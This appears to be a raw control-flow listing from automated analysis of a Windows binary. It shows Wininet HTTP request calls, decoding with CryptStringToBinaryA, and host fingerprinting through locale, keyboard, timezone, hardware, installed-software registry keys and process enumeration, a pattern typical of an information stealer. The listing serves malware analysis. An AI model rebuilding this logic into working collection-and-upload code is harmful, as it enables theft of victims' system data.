GetVolumeInformationA 14609->14610 14611 92754c 14609->14611 14612 927591 14610->14612 14611->14610 14613 9275fc GetProcessHeap RtlAllocateHeap 14612->14613 14614 927628 wsprintfA 14613->14614 14615 927619 14613->14615 14616 92a740 lstrcpy 14614->14616 14617 92a740 lstrcpy 14615->14617 14618 925da7 14616->14618 14617->14618 14618->13682 14620 92a7a0 lstrcpy 14619->14620 14621 914899 14620->14621 15673 9147b0 14621->15673 14623 9148a5 14624 92a740 lstrcpy 14623->14624 14625 9148d7 14624->14625 14626 92a740 lstrcpy 14625->14626 14627 9148e4 14626->14627 14628 92a740 lstrcpy 14627->14628 14629 9148f1 14628->14629 14630 92a740 lstrcpy 14629->14630 14631 9148fe 14630->14631 14632 92a740 lstrcpy 14631->14632 14633 91490b InternetOpenA StrCmpCA 14632->14633 14634 914944 14633->14634 14635 914ecb InternetCloseHandle 14634->14635 15679 928b60 14634->15679 14637 914ee8 14635->14637 15694 919ac0 CryptStringToBinaryA 14637->15694 14638 914963 15687 92a920 14638->15687 14641 914976 14643 92a8a0 lstrcpy 14641->14643 14648 91497f 14643->14648 14644 92a820 2 API calls 14645 914f05 14644->14645 14647 92a9b0 4 API calls 14645->14647 14646 914f27 codecvt 14650 92a7a0 lstrcpy 14646->14650 14649 914f1b 14647->14649 14652 92a9b0 4 API calls 14648->14652 14651 92a8a0 lstrcpy 14649->14651 14663 914f57 14650->14663 14651->14646 14653 9149a9 14652->14653 14654 92a8a0 lstrcpy 14653->14654 14655 9149b2 14654->14655 14656 92a9b0 4 API calls 14655->14656 14657 9149d1 14656->14657 14658 92a8a0 lstrcpy 14657->14658 14659 9149da 14658->14659 14660 92a920 3 API calls 14659->14660 14661 9149f8 14660->14661 14662 92a8a0 lstrcpy 14661->14662 14664 914a01 14662->14664 14663->13685 14665 92a9b0 4 API calls 14664->14665 14666 914a20 14665->14666 14667 92a8a0 lstrcpy 14666->14667 14668 914a29 14667->14668 14669 92a9b0 4 API calls 14668->14669 14670 914a48 14669->14670 14671 92a8a0 lstrcpy 14670->14671 14672 914a51 14671->14672 14673 92a9b0 4 API calls 14672->14673 14674 914a7d 14673->14674 14675 92a920 3 API calls 14674->14675 14676 914a84 14675->14676 14677 92a8a0 lstrcpy 14676->14677 14678 914a8d 14677->14678 14679 914aa3 InternetConnectA 14678->14679 14679->14635 14680 914ad3 HttpOpenRequestA 14679->14680 14682 914b28 14680->14682 14683 914ebe InternetCloseHandle 14680->14683 14684 92a9b0 4 API calls 14682->14684 14683->14635 14685 914b3c 14684->14685 14686 92a8a0 lstrcpy 14685->14686 14687 914b45 14686->14687 14688 92a920 3 API calls 14687->14688 14689 914b63 14688->14689 14690 92a8a0 lstrcpy 14689->14690 14691 914b6c 14690->14691 14692 92a9b0 4 API calls 14691->14692 14693 914b8b 14692->14693 14694 92a8a0 lstrcpy 14693->14694 14695 914b94 14694->14695 14696 92a9b0 4 API calls 14695->14696 14697 914bb5 14696->14697 14698 92a8a0 lstrcpy 14697->14698 14699 914bbe 14698->14699 14700 92a9b0 4 API calls 14699->14700 14701 914bde 14700->14701 14702 92a8a0 lstrcpy 14701->14702 14703 914be7 14702->14703 14704 92a9b0 4 API calls 14703->14704 14705 914c06 14704->14705 14706 92a8a0 lstrcpy 14705->14706 14707 914c0f 14706->14707 14708 92a920 3 API calls 14707->14708 14709 914c2d 14708->14709 14710 92a8a0 lstrcpy 14709->14710 14711 914c36 14710->14711 14712 92a9b0 4 API calls 14711->14712 14713 914c55 14712->14713 14714 92a8a0 lstrcpy 14713->14714 14715 914c5e 14714->14715 14716 92a9b0 4 API calls 14715->14716 14717 914c7d 14716->14717 14718 92a8a0 lstrcpy 14717->14718 14719 914c86 14718->14719 14720 92a920 3 API calls 14719->14720 14721 914ca4 14720->14721 14722 92a8a0 lstrcpy 14721->14722 14723 914cad 14722->14723 14724 92a9b0 4 API calls 14723->14724 14725 914ccc 14724->14725 14726 92a8a0 lstrcpy 14725->14726 14727 914cd5 14726->14727 14728 92a9b0 4 API calls 14727->14728 14729 914cf6 14728->14729 14730 92a8a0 lstrcpy 14729->14730 14731 914cff 14730->14731 14732 92a9b0 4 API calls 14731->14732 14733 914d1f 14732->14733 14734 92a8a0 lstrcpy 14733->14734 14735 914d28 14734->14735 14736 92a9b0 4 API calls 14735->14736 14737 914d47 14736->14737 14738 92a8a0 lstrcpy 14737->14738 14739 914d50 14738->14739 14740 92a920 3 API calls 14739->14740 14741 914d6e 14740->14741 14742 92a8a0 lstrcpy 14741->14742 14743 914d77 14742->14743 14744 92a740 lstrcpy 14743->14744 14745 914d92 14744->14745 14746 92a920 3 API calls 14745->14746 14747 914db3 14746->14747 14748 92a920 3 API calls 14747->14748 14749 914dba 14748->14749 14750 92a8a0 lstrcpy 14749->14750 14751 914dc6 14750->14751 14752 914de7 lstrlen 14751->14752 14753 914dfa 14752->14753 14754 914e03 lstrlen 14753->14754 15693 92aad0 14754->15693 14756 914e13 HttpSendRequestA 14757 914e32 InternetReadFile 14756->14757 14758 914e67 InternetCloseHandle 14757->14758 14763 914e5e 14757->14763 14760 92a800 14758->14760 14760->14683 14761 92a9b0 4 API calls 14761->14763 14762 92a8a0 lstrcpy 14762->14763 14763->14757 14763->14758 14763->14761 14763->14762 15700 92aad0 14764->15700 14766 9217c4 StrCmpCA 14767 9217d7 14766->14767 14768 9217cf ExitProcess 14766->14768 14769 9219c2 14767->14769 14770 921932 StrCmpCA 14767->14770 14771 921913 StrCmpCA 14767->14771 14772 921970 StrCmpCA 14767->14772 14773 9218f1 StrCmpCA 14767->14773 14774 921951 StrCmpCA 14767->14774 14775 92187f StrCmpCA 14767->14775 14776 92185d StrCmpCA 14767->14776 14777 9218cf StrCmpCA 14767->14777 14778 9218ad StrCmpCA 14767->14778 14779 92a820 lstrlen lstrcpy 14767->14779 14769->13687 14770->14767 14771->14767 14772->14767 14773->14767 14774->14767 14775->14767 14776->14767 14777->14767 14778->14767 14779->14767 14781 92a7a0 lstrcpy 14780->14781 14782 915979 14781->14782 14783 9147b0 2 API calls 14782->14783 14784 915985 14783->14784 14785 92a740 lstrcpy 14784->14785 14786 9159ba 14785->14786 14787 92a740 lstrcpy 14786->14787 14788 9159c7 14787->14788 14789 92a740 lstrcpy 14788->14789 14790 9159d4 14789->14790 14791 92a740 lstrcpy 14790->14791 14792 9159e1 14791->14792 14793 92a740 lstrcpy 14792->14793 14794 9159ee InternetOpenA StrCmpCA 14793->14794 14795 915a1d 14794->14795 14796 915fc3 InternetCloseHandle 14795->14796 14798 928b60 3 API calls 14795->14798 14797 915fe0 14796->14797 14800 919ac0 4 API calls 14797->14800 14799 915a3c 14798->14799 14801 92a920 3 API calls 14799->14801 14803 915fe6 14800->14803 14802 915a4f 14801->14802 14804 92a8a0 lstrcpy 14802->14804 14805 92a820 2 API calls 14803->14805 14807 91601f codecvt 14803->14807 14809 915a58 14804->14809 14806 915ffd 14805->14806 14808 92a9b0 4 API calls 14806->14808 14811 92a7a0 lstrcpy 14807->14811 14810 916013 14808->14810 14813 92a9b0 4 API calls 14809->14813 14812 92a8a0 lstrcpy 14810->14812 14822 91604f 14811->14822 14812->14807 14814 915a82 14813->14814 14815 92a8a0 lstrcpy 14814->14815 14816 915a8b 14815->14816 14817 92a9b0 4 API calls 14816->14817 14818 915aaa 14817->14818 14819 92a8a0 lstrcpy 14818->14819 14820 915ab3 14819->14820 14821 92a920 3 API calls 14820->14821 14823 915ad1 14821->14823 14822->13693 14824 92a8a0 lstrcpy 14823->14824 14825 915ada 14824->14825 14826 92a9b0 4 API calls 14825->14826 14827 915af9 14826->14827 14828 92a8a0 lstrcpy 14827->14828 14829 915b02 14828->14829 14830 92a9b0 4 API calls 14829->14830 14831 915b21 14830->14831 14832 92a8a0 lstrcpy 14831->14832 14833 915b2a 14832->14833 14834 92a9b0 4 API calls 14833->14834 14835 915b56 14834->14835 14836 92a920 3 API calls 14835->14836 14837 915b5d 14836->14837 14838 92a8a0 lstrcpy 14837->14838 14839 915b66 14838->14839 14840 915b7c InternetConnectA 14839->14840 14840->14796 14841 915bac HttpOpenRequestA 14840->14841 14843 915fb6 InternetCloseHandle 14841->14843 14844 915c0b 14841->14844 14843->14796 14845 92a9b0 4 API calls 14844->14845 14846 915c1f 14845->14846 14847 92a8a0 lstrcpy 14846->14847 14848 915c28 14847->14848 14849 92a920 3 API calls 14848->14849 14850 915c46 14849->14850 14851 92a8a0 lstrcpy 14850->14851 14852 915c4f 14851->14852 14853 92a9b0 4 API calls 14852->14853 14854 915c6e 14853->14854 14855 92a8a0 lstrcpy 14854->14855 14856 915c77 14855->14856 14857 92a9b0 4 API calls 14856->14857 14858 915c98 14857->14858 14859 92a8a0 lstrcpy 14858->14859 14860 915ca1 14859->14860 14861 92a9b0 4 API calls 14860->14861 14862 915cc1 14861->14862 14863 92a8a0 lstrcpy 14862->14863 14864 915cca 14863->14864 14865 92a9b0 4 API calls 14864->14865 14866 915ce9 14865->14866 14867 92a8a0 lstrcpy 14866->14867 14868 915cf2 14867->14868 14869 92a920 3 API calls 14868->14869 14870 915d10 14869->14870 14871 92a8a0 lstrcpy 14870->14871 14872 915d19 14871->14872 14873 92a9b0 4 API calls 14872->14873 14874 915d38 14873->14874 14875 92a8a0 lstrcpy 14874->14875 14876 915d41 14875->14876 14877 92a9b0 4 API calls 14876->14877 14878 915d60 14877->14878 14879 92a8a0 lstrcpy 14878->14879 14880 915d69 14879->14880 14881 92a920 3 API calls 14880->14881 14882 915d87 14881->14882 14883 92a8a0 lstrcpy 14882->14883 14884 915d90 14883->14884 14885 92a9b0 4 API calls 14884->14885 14886 915daf 14885->14886 14887 92a8a0 lstrcpy 14886->14887 14888 915db8 14887->14888 14889 92a9b0 4 API calls 14888->14889 14890 915dd9 14889->14890 14891 92a8a0 lstrcpy 14890->14891 14892 915de2 14891->14892 14893 92a9b0 4 API calls 14892->14893 14894 915e02 14893->14894 14895 92a8a0 lstrcpy 14894->14895 14896 915e0b 14895->14896 14897 92a9b0 4 API calls 14896->14897 14898 915e2a 14897->14898 14899 92a8a0 lstrcpy 14898->14899 14900 915e33 14899->14900 14901 92a920 3 API calls 14900->14901 14902 915e54 14901->14902 14903 92a8a0 lstrcpy 14902->14903 14904 915e5d 14903->14904 14905 915e70 lstrlen 14904->14905 15701 92aad0 14905->15701 14907 915e81 lstrlen GetProcessHeap RtlAllocateHeap 15702 92aad0 14907->15702 14909 915eae lstrlen 14910 915ebe 14909->14910 14911 915ed7 lstrlen 14910->14911 14912 915ee7 14911->14912 14913 915ef0 lstrlen 14912->14913 14914 915f04 14913->14914 14915 915f1a lstrlen 14914->14915 15703 92aad0 14915->15703 14917 915f2a HttpSendRequestA 14918 915f35 InternetReadFile 14917->14918 14919 915f6a InternetCloseHandle 14918->14919 14923 915f61 14918->14923 14919->14843 14921 92a9b0 4 API calls 14921->14923 14922 92a8a0 lstrcpy 14922->14923 14923->14918 14923->14919 14923->14921 14923->14922 14925 921077 14924->14925 14926 921151 14925->14926 14927 92a820 lstrlen lstrcpy 14925->14927 14926->13695 14927->14925 14933 920db7 14928->14933 14929 920f17 14929->13703 14930 920e27 StrCmpCA 14930->14933 14931 920e67 StrCmpCA 14931->14933 14932 920ea4 StrCmpCA 14932->14933 14933->14929 14933->14930 14933->14931 14933->14932 14934 92a820 lstrlen lstrcpy 14933->14934 14934->14933 14937 920f67 14935->14937 14936 921044 14936->13711 14937->14936 14938 920fb2 StrCmpCA 14937->14938 14939 92a820 lstrlen lstrcpy 14937->14939 14938->14937 14939->14937 14941 92a740 lstrcpy 14940->14941 14942 921a26 14941->14942 14943 92a9b0 4 API calls 14942->14943 14944 921a37 14943->14944 14945 92a8a0 lstrcpy 14944->14945 14946 921a40 14945->14946 14947 92a9b0 4 API calls 14946->14947 14948 921a5b 14947->14948 14949 92a8a0 lstrcpy 14948->14949 14950 921a64 14949->14950 14951 92a9b0 4 API calls 14950->14951 14952 921a7d 14951->14952 14953 92a8a0 lstrcpy 14952->14953 14954 921a86 14953->14954 14955 92a9b0 4 API calls 14954->14955 14956 921aa1 14955->14956 14957 92a8a0 lstrcpy 14956->14957 14958 921aaa 14957->14958 14959 92a9b0 4 API calls 14958->14959 14960 921ac3 14959->14960 14961 92a8a0 lstrcpy 14960->14961 14962 921acc 14961->14962 14963 92a9b0 4 API calls 14962->14963 14964 921ae7 14963->14964 14965 92a8a0 lstrcpy 14964->14965 14966 921af0 14965->14966 14967 92a9b0 4 API calls 14966->14967 14968 921b09 14967->14968 14969 92a8a0 lstrcpy 14968->14969 14970 921b12 14969->14970 14971 92a9b0 4 API calls 14970->14971 14972 921b2d 14971->14972 14973 92a8a0 lstrcpy 14972->14973 14974 921b36 14973->14974 14975 92a9b0 4 API calls 14974->14975 14976 921b4f 14975->14976 14977 92a8a0 lstrcpy 14976->14977 14978 921b58 14977->14978 14979 92a9b0 4 API calls 14978->14979 14980 921b76 14979->14980 14981 92a8a0 lstrcpy 14980->14981 14982 921b7f 14981->14982 14983 927500 6 API calls 14982->14983 14984 921b96 14983->14984 14985 92a920 3 API calls 14984->14985 14986 921ba9 14985->14986 14987 92a8a0 lstrcpy 14986->14987 14988 921bb2 14987->14988 14989 92a9b0 4 API calls 14988->14989 14990 921bdc 14989->14990 14991 92a8a0 lstrcpy 14990->14991 14992 921be5 14991->14992 14993 92a9b0 4 API calls 14992->14993 14994 921c05 14993->14994 14995 92a8a0 lstrcpy 14994->14995 14996 921c0e 14995->14996 15704 927690 GetProcessHeap RtlAllocateHeap 14996->15704 14999 92a9b0 4 API calls 15000 921c2e 14999->15000 15001 92a8a0 lstrcpy 15000->15001 15002 921c37 15001->15002 15003 92a9b0 4 API calls 15002->15003 15004 921c56 15003->15004 15005 92a8a0 lstrcpy 15004->15005 15006 921c5f 15005->15006 15007 92a9b0 4 API calls 15006->15007 15008 921c80 15007->15008 15009 92a8a0 lstrcpy 15008->15009 15010 921c89 15009->15010 15711 9277c0 GetCurrentProcess IsWow64Process 15010->15711 15013 92a9b0 4 API calls 15014 921ca9 15013->15014 15015 92a8a0 lstrcpy 15014->15015 15016 921cb2 15015->15016 15017 92a9b0 4 API calls 15016->15017 15018 921cd1 15017->15018 15019 92a8a0 lstrcpy 15018->15019 15020 921cda 15019->15020 15021 92a9b0 4 API calls 15020->15021 15022 921cfb 15021->15022 15023 92a8a0 lstrcpy 15022->15023 15024 921d04 15023->15024 15025 927850 3 API calls 15024->15025 15026 921d14 15025->15026 15027 92a9b0 4 API calls 15026->15027 15028 921d24 15027->15028 15029 92a8a0 lstrcpy 15028->15029 15030 921d2d 15029->15030 15031 92a9b0 4 API calls 15030->15031 15032 921d4c 15031->15032 15033 92a8a0 lstrcpy 15032->15033 15034 921d55 15033->15034 15035 92a9b0 4 API calls 15034->15035 15036 921d75 15035->15036 15037 92a8a0 lstrcpy 15036->15037 15038 921d7e 15037->15038 15039 9278e0 3 API calls 15038->15039 15040 921d8e 15039->15040 15041 92a9b0 4 API calls 15040->15041 15042 921d9e 15041->15042 15043 92a8a0 lstrcpy 15042->15043 15044 921da7 15043->15044 15045 92a9b0 4 API calls 15044->15045 15046 921dc6 15045->15046 15047 92a8a0 lstrcpy 15046->15047 15048 921dcf 15047->15048 15049 92a9b0 4 API calls 15048->15049 15050 921df0 15049->15050 15051 92a8a0 lstrcpy 15050->15051 15052 921df9 15051->15052 15713 927980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15052->15713 15055 92a9b0 4 API calls 15056 921e19 15055->15056 15057 92a8a0 lstrcpy 15056->15057 15058 921e22 15057->15058 15059 92a9b0 4 API calls 15058->15059 15060 921e41 15059->15060 15061 92a8a0 lstrcpy 15060->15061 15062 921e4a 15061->15062 15063 92a9b0 4 API calls 15062->15063 15064 921e6b 15063->15064 15065 92a8a0 lstrcpy 15064->15065 15066 921e74 15065->15066 15715 927a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15066->15715 15069 92a9b0 4 API calls 15070 921e94 15069->15070 15071 92a8a0 lstrcpy 15070->15071 15072 921e9d 15071->15072 15073 92a9b0 4 API calls 15072->15073 15074 921ebc 15073->15074 15075 92a8a0 lstrcpy 15074->15075 15076 921ec5 15075->15076 15077 92a9b0 4 API calls 15076->15077 15078 921ee5 15077->15078 15079 92a8a0 lstrcpy 15078->15079 15080 921eee 15079->15080 15718 927b00 GetUserDefaultLocaleName 15080->15718 15083 92a9b0 4 API calls 15084 921f0e 15083->15084 15085 92a8a0 lstrcpy 15084->15085 15086 921f17 15085->15086 15087 92a9b0 4 API calls 15086->15087 15088 921f36 15087->15088 15089 92a8a0 lstrcpy 15088->15089 15090 921f3f 15089->15090 15091 92a9b0 4 API calls 15090->15091 15092 921f60 15091->15092 15093 92a8a0 lstrcpy 15092->15093 15094 921f69 15093->15094 15722 927b90 15094->15722 15096 921f80 15097 92a920 3 API calls 15096->15097 15098 921f93 15097->15098 15099 92a8a0 lstrcpy 15098->15099 15100 921f9c 15099->15100 15101 92a9b0 4 API calls 15100->15101 15102 921fc6 15101->15102 15103 92a8a0 lstrcpy 15102->15103 15104 921fcf 15103->15104 15105 92a9b0 4 API calls 15104->15105 15106 921fef 15105->15106 15107 92a8a0 lstrcpy 15106->15107 15108 921ff8 15107->15108 15734 927d80 GetSystemPowerStatus 15108->15734 15111 92a9b0 4 API calls 15112 922018 15111->15112 15113 92a8a0 lstrcpy 15112->15113 15114 922021 15113->15114 15115 92a9b0 4 API calls 15114->15115 15116 922040 15115->15116 15117 92a8a0 lstrcpy 15116->15117 15118 922049 15117->15118 15119 92a9b0 4 API calls 15118->15119 15120 92206a 15119->15120 15121 92a8a0 lstrcpy 15120->15121 15122 922073 15121->15122 15123 92207e GetCurrentProcessId 15122->15123 15736 929470 OpenProcess 15123->15736 15126 92a920 3 API calls 15127 9220a4 15126->15127 15128 92a8a0 lstrcpy 15127->15128 15129 9220ad 15128->15129 15130 92a9b0 4 API calls 15129->15130 15131 9220d7 15130->15131 15132 92a8a0 lstrcpy 15131->15132 15133 9220e0 15132->15133 15134 92a9b0 4 API calls 15133->15134 15135 922100 15134->15135 15136 92a8a0 lstrcpy 15135->15136 15137 922109 15136->15137 15741 927e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15137->15741 15140 92a9b0 4 API calls 15141 922129 15140->15141 15142 92a8a0 lstrcpy 15141->15142 15143 922132 15142->15143 15144 92a9b0 4 API calls 15143->15144 15145 922151 15144->15145 15146 92a8a0 lstrcpy 15145->15146 15147 92215a 15146->15147 15148 92a9b0 4 API calls 15147->15148 15149 92217b 15148->15149 15150 92a8a0 lstrcpy 15149->15150 15151 922184 15150->15151 15745 927f60 15151->15745 15154 92a9b0 4 API calls 15155 9221a4 15154->15155 15156 92a8a0 lstrcpy 15155->15156 15157 9221ad 15156->15157 15158 92a9b0 4 API calls 15157->15158 15159 9221cc 15158->15159 15160 92a8a0 lstrcpy 15159->15160 15161 9221d5 15160->15161 15162 92a9b0 4 API calls 15161->15162 15163 9221f6 15162->15163 15164 92a8a0 lstrcpy 15163->15164 15165 9221ff 15164->15165 15758 927ed0 GetSystemInfo wsprintfA 15165->15758 15168 92a9b0 4 API calls 15169 92221f 15168->15169 15170 92a8a0 lstrcpy 15169->15170 15171 922228 15170->15171 15172 92a9b0 4 API calls 15171->15172 15173 922247 15172->15173 15174 92a8a0 lstrcpy 15173->15174 15175 922250 15174->15175 15176 92a9b0 4 API calls 15175->15176 15177 922270 15176->15177 15178 92a8a0 lstrcpy 15177->15178 15179 922279 15178->15179 15760 928100 GetProcessHeap RtlAllocateHeap 15179->15760 15182 92a9b0 4 API calls 15183 922299 15182->15183 15184 92a8a0 lstrcpy 15183->15184 15185 9222a2 15184->15185 15186 92a9b0 4 API calls 15185->15186 15187 9222c1 15186->15187 15188 92a8a0 lstrcpy 15187->15188 15189 9222ca 15188->15189 15190 92a9b0 4 API calls 15189->15190 15191 9222eb 15190->15191 15192 92a8a0 lstrcpy 15191->15192 15193 9222f4 15192->15193 15766 9287c0 15193->15766 15196 92a920 3 API calls 15197 92231e 15196->15197 15198 92a8a0 lstrcpy 15197->15198 15199 922327 15198->15199 15200 92a9b0 4 API calls 15199->15200 15201 922351 15200->15201 15202 92a8a0 lstrcpy 15201->15202 15203 92235a 15202->15203 15204 92a9b0 4 API calls 15203->15204 15205 92237a 15204->15205 15206 92a8a0 lstrcpy 15205->15206 15207 922383 15206->15207 15208 92a9b0 4 API calls 15207->15208 15209 9223a2 15208->15209 15210 92a8a0 lstrcpy 15209->15210 15211 9223ab 15210->15211 15771 9281f0 15211->15771 15213 9223c2 15214 92a920 3 API calls 15213->15214 15215 9223d5 15214->15215 15216 92a8a0 lstrcpy 15215->15216 15217 9223de 15216->15217 15218 92a9b0 4 API calls 15217->15218 15219 92240a 15218->15219 15220 92a8a0 lstrcpy 15219->15220 15221 922413 15220->15221 15222 92a9b0 4 API calls 15221->15222 15223 922432 15222->15223 15224 92a8a0 lstrcpy 15223->15224 15225 92243b 15224->15225 15226 92a9b0 4 API calls 15225->15226 15227 92245c 15226->15227 15228 92a8a0 lstrcpy 15227->15228 15229 922465 15228->15229 15230 92a9b0 4 API calls 15229->15230 15231 922484 15230->15231 15232 92a8a0 lstrcpy 15231->15232 15233 92248d 15232->15233 15234 92a9b0 4 API calls 15233->15234 15235 9224ae 15234->15235 15236 92a8a0 lstrcpy 15235->15236 15237 9224b7 15236->15237 15779 928320 15237->15779 15239 9224d3 15240 92a920 3 API calls 15239->15240 15241 9224e6 15240->15241 15242 92a8a0 lstrcpy 15241->15242 15243 9224ef 15242->15243 15244 92a9b0 4 API calls 15243->15244 15245 922519 15244->15245 15246 92a8a0 lstrcpy 15245->15246 15247 922522 15246->15247 15248 92a9b0 4 API calls 15247->15248 15249 922543 15248->15249 15250 92a8a0 lstrcpy 15249->15250 15251 92254c 15250->15251 15252 928320 17 API calls 15251->15252 15253 922568 15252->15253 15254 92a920 3 API calls 15253->15254 15255 92257b 15254->15255 15256 92a8a0 lstrcpy 15255->15256 15257 922584 15256->15257 15258 92a9b0 4 API calls 15257->15258 15259 9225ae 15258->15259 15260 92a8a0 lstrcpy 15259->15260 15261 9225b7 15260->15261 15262 92a9b0 4 API calls 15261->15262 15263 9225d6 15262->15263 15264 92a8a0 lstrcpy 15263->15264 15265 9225df 15264->15265 15266 92a9b0 4 API calls 15265->15266 15267 922600 15266->15267 15268 92a8a0 lstrcpy 15267->15268 15269 922609 15268->15269 15815 928680 15269->15815 15271 922620 15272 92a920 3 API calls 15271->15272 15273 922633 15272->15273 15274 92a8a0 lstrcpy 15273->15274 15275 92263c 15274->15275 15276 92265a lstrlen 15275->15276 15277 92266a 15276->15277 15278 92a740 lstrcpy 15277->15278 15279 92267c 15278->15279 15280 911590 lstrcpy 15279->15280 15281 92268d 15280->15281 15825 925190 15281->15825 15283 922699 15283->13715 16013 92aad0 15284->16013 15286 915009 InternetOpenUrlA 15287 915021 15286->15287 15288 9150a0 InternetCloseHandle InternetCloseHandle 15287->15288 15289 91502a InternetReadFile 15287->15289 15290 9150ec 15288->15290 15289->15287 15290->13719 16014 9198d0 15291->16014 15293 920759 15294 920a38 15293->15294 15295 92077d 15293->15295 15296 911590 lstrcpy 15294->15296 15298 920799 StrCmpCA 15295->15298 15297 920a49 15296->15297 16190 920250 15297->16190 15299 9207a8 15298->15299 15327 920843 15298->15327 15301 92a7a0 lstrcpy 15299->15301 15303 9207c3 15301->15303 15305 911590 lstrcpy 15303->15305 15304 920865 StrCmpCA 15306 920874 15304->15306 15343 92096b 15304->15343 15307 92080c 15305->15307 15308 92a740 lstrcpy 15306->15308 15310 92a7a0 lstrcpy 15307->15310 15309 920881 15308->15309 15312 92a9b0 4 API calls 15309->15312 15313 920823 15310->15313 15311 92099c StrCmpCA 15314 920a2d 15311->15314 15315 9209ab 15311->15315 15317 9208ac 15312->15317 15318 92a7a0 lstrcpy 15313->15318 15314->13723 15316 911590 lstrcpy 15315->15316 15319 9209f4 15316->15319 15320 92a920 3 API calls 15317->15320 15321 92083e 15318->15321 15322 92a7a0 lstrcpy 15319->15322 15323 9208b3 15320->15323 16017 91fb00 15321->16017 15325 920a0d 15322->15325 15326 92a9b0 4 API calls 15323->15326 15328 92a7a0 lstrcpy 15325->15328 15329 9208ba 15326->15329 15327->15304 15330 920a28 15328->15330 15331 92a8a0 lstrcpy 15329->15331 16133 920030 15330->16133 15343->15311 15665 92a7a0 lstrcpy 15664->15665 15666 911683 15665->15666 15667 92a7a0 lstrcpy 15666->15667 15668 911695 15667->15668 15669 92a7a0 lstrcpy 15668->15669 15670 9116a7 15669->15670 15671 92a7a0 lstrcpy 15670->15671 15672 9115a3 15671->15672 15672->14546 15674 9147c6 15673->15674 15675 914838 lstrlen 15674->15675 15699 92aad0 15675->15699 15677 914848 InternetCrackUrlA 15678 914867 15677->15678 15678->14623 15680 92a740 lstrcpy 15679->15680 15681 928b74 15680->15681 15682 92a740 lstrcpy 15681->15682 15683 928b82 GetSystemTime 15682->15683 15685 928b99 15683->15685 15684 92a7a0 lstrcpy 15686 928bfc 15684->15686 15685->15684 15686->14638 15688 92a931 15687->15688 15689 92a988 15688->15689 15691 92a968 lstrcpy lstrcat 15688->15691 15690 92a7a0 lstrcpy 15689->15690 15692 92a994 15690->15692 15691->15689 15692->14641 15693->14756 15695 919af9 LocalAlloc 15694->15695 15696 914eee 15694->15696 15695->15696 15697 919b14 CryptStringToBinaryA 15695->15697 15696->14644 15696->14646 15697->15696 15698 919b39 LocalFree 15697->15698 15698->15696 15699->15677 15700->14766 15701->14907 15702->14909 15703->14917 15832 9277a0 15704->15832 15707 9276c6 RegOpenKeyExA 15709 9276e7 RegQueryValueExA 15707->15709 15710 927704 RegCloseKey 15707->15710 15708 921c1e 15708->14999 15709->15710 15710->15708 15712 921c99 15711->15712 15712->15013 15714 921e09 15713->15714 15714->15055 15716 921e84 15715->15716 15717 927a9a wsprintfA 15715->15717 15716->15069 15717->15716 15719 921efe 15718->15719 15720 927b4d 15718->15720 15719->15083 15839 928d20 LocalAlloc CharToOemW 15720->15839 15723 92a740 lstrcpy 15722->15723 15724 927bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15723->15724 15733 927c25 15724->15733 15725 927c46 GetLocaleInfoA 15725->15733 15726 927d18 15727 927d28 15726->15727 15728 927d1e LocalFree 15726->15728 15730 92a7a0 lstrcpy 15727->15730 15728->15727 15729 92a9b0 lstrcpy lstrlen lstrcpy lstrcat 15729->15733 15731 927d37 15730->15731 15731->15096 15732 92a8a0 lstrcpy 15732->15733 15733->15725 15733->15726 15733->15729 15733->15732 15735 922008 15734->15735 15735->15111 15737 929493 GetModuleFileNameExA CloseHandle 15736->15737 15738 9294b5 15736->15738 15737->15738 15739 92a740 lstrcpy 15738->15739 15740 922091 15739->15740 15740->15126 15742 922119 15741->15742 15743 927e68 RegQueryValueExA 15741->15743 15742->15140 15744 927e8e RegCloseKey 15743->15744 15744->15742 15746 927fb9 GetLogicalProcessorInformationEx 15745->15746 15747 927fd8 GetLastError 15746->15747 15749 928029 15746->15749 15748 928022 15747->15748 15757 927fe3 15747->15757 15750 922194 15748->15750 15753 9289f0 2 API calls 15748->15753 15754 9289f0 2 API calls 15749->15754 15750->15154 15753->15750 15755 92807b 15754->15755 15755->15748 15756 928084 wsprintfA 15755->15756 15756->15750 15757->15746 15757->15750 15840 9289f0 15757->15840 15843 928a10 GetProcessHeap RtlAllocateHeap 15757->15843 15759 92220f 15758->15759 15759->15168 15761 9289b0 15760->15761 15762 92814d GlobalMemoryStatusEx 15761->15762 15765 928163 __aulldiv 15762->15765 15763 92819b wsprintfA 15764 922289 15763->15764 15764->15182 15765->15763 15767 9287fb GetProcessHeap RtlAllocateHeap wsprintfA 15766->15767 15769 92a740 lstrcpy 15767->15769 15770 92230b 15769->15770 15770->15196 15772 92a740 lstrcpy 15771->15772 15778 928229 15772->15778 15773 928263 15774 92a7a0 lstrcpy 15773->15774 15776 9282dc 15774->15776 15775 92a9b0 lstrcpy lstrlen lstrcpy lstrcat 15775->15778 15776->15213 15777 92a8a0 lstrcpy 15777->15778 15778->15773 15778->15775 15778->15777 15780 92a740 lstrcpy 15779->15780 15781 92835c RegOpenKeyExA 15780->15781 15782 9283d0 15781->15782 15783 9283ae 15781->15783 15785 928613 RegCloseKey 15782->15785 15786 9283f8 RegEnumKeyExA 15782->15786 15784 92a7a0 lstrcpy 15783->15784 15795 9283bd 15784->15795 15789 92a7a0 lstrcpy 15785->15789 15787 92860e 15786->15787 15788 92843f wsprintfA RegOpenKeyExA 15786->15788 15787->15785 15790 9284c1 RegQueryValueExA 15788->15790 15791 928485 RegCloseKey RegCloseKey 15788->15791 15789->15795 15793 928601 RegCloseKey 15790->15793 15794 9284fa lstrlen 15790->15794 15792 92a7a0 lstrcpy 15791->15792 15792->15795 15793->15787 15794->15793 15796 928510 15794->15796 15795->15239 15797 92a9b0 4 API calls 15796->15797 15798 928527 15797->15798 15799 92a8a0 lstrcpy 15798->15799 15800 928533 15799->15800 15801 92a9b0 4 API calls 15800->15801 15802 928557 15801->15802 15803 92a8a0 lstrcpy 15802->15803 15804 928563 15803->15804 15805 92856e RegQueryValueExA 15804->15805 15805->15793 15806 9285a3 15805->15806 15807 92a9b0 4 API calls 15806->15807 15808 9285ba 15807->15808 15809 92a8a0 lstrcpy 15808->15809 15810 9285c6 15809->15810 15811 92a9b0 4 API calls 15810->15811 15812 9285ea 15811->15812 15813 92a8a0 lstrcpy 15812->15813 15814 9285f6 15813->15814 15814->15793 15816 92a740 lstrcpy 15815->15816 15817 9286bc CreateToolhelp32Snapshot Process32First 15816->15817 15818 9286e8 Process32Next 15817->15818 15819 92875d CloseHandle 15817->15819 